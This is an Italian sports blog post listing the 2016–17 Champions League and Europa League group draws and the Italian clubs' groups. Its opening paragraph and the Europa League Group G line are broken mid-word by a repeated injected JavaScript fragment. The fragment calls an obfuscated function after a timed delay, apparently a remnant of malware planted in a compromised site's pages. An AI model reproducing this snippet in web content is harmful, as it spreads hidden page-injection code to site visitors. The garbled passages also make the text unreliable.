The Locker Room

L’ITALIA NELLE URNE

26 agosto 2016 Coppe, Speak About
m

I sorteggi di Champion e Europa League: ecco il destino delle italiane che dovranno dimostrarsi mature e determinate per centrare un primo obiettivo di stagione che l’Italia intera si deve porre. Passare la fare a gironi tutte incolumi.

Con The Locker Room nei prossimi giorni andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andremo alla scoperta delle avversarie di Napoli, Juventus, Fiorentina, Sassuolo, Roma e Inter. 

 

GIRONI CHAMPIONS LEAGUE

Gruppo A: Paris Saint-Germain (Francia), Arsenal (Ing), Basilea (Svi), Ludogorets (Bul)

Gruppo B: Benfica (Por), NAPOLI, Dinamo Kiev (Ucr), Besiktas (Tur)

Gruppo C: Barcellona (Spa), Manchester City (Ing), Borussia Mönchengladbach (Ger), Celtic (Sco)
Gruppo D: Bayern Monaco (Ger), Atletico Madrid (Spa), Psv Eindhoven (Ola), Rostov (Rus)
Gruppo E: Cska Mosca (Rus), Bayer Leverkusen (Ger), Tottenham (Ing), Monaco (Fra)
Gruppo F: Real Madrid (Spa), Borussia Dortmund (Ger), Sporting Lisbona (Por), Legia Varsavia (Pol)
Gruppo G: Leicester (Ing), Porto (Por), Bruges (Bel), Copenaghen (Dan)

Gruppo H:JUVENTUS, Siviglia (Spa), Lione (Fra), Dinamo Zagabria (Cro)

 

GIRONI EUROPA LEAGUE

GIRONE A: Manchester United, Fenerbahce, Feyenoord, Zorya
GIRONE B: Olympiacos, Apoel Nicosia, Young Boys, Astana
GIRONE C: Anderlecht, Saint Etienne, Mainz, Gabala

GIRONE D: Zenit, Az Alkmaar, Maccabi Tel Aviv, Dundalk

GIRONE E: Viktoria Plzen, ROMA, Austria Vienna, Astra
GIRONE F: Athletic Bilbao, Genk, Rapid Vienna, SASSUOLO
GIRONE G: Ajax, Standom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andard Liegi, Celta Vigo, Panathinaikos
GIRONE H: Shakthar Donetsk, Braga, Gent, Konyaspor
GIRONE I: Schalke, Salisburgo, Krasnodar, Nizza
GIRONE J: FIORENTINA, Paok, Slovan Liberec, Qarabag
GIRONE K: INTER, Sparta Praga, Southampton, Hapoel Beer Sheva
GIRONE L: Villarreal, Steaua Bucarest, Zurigo, Osmanlispor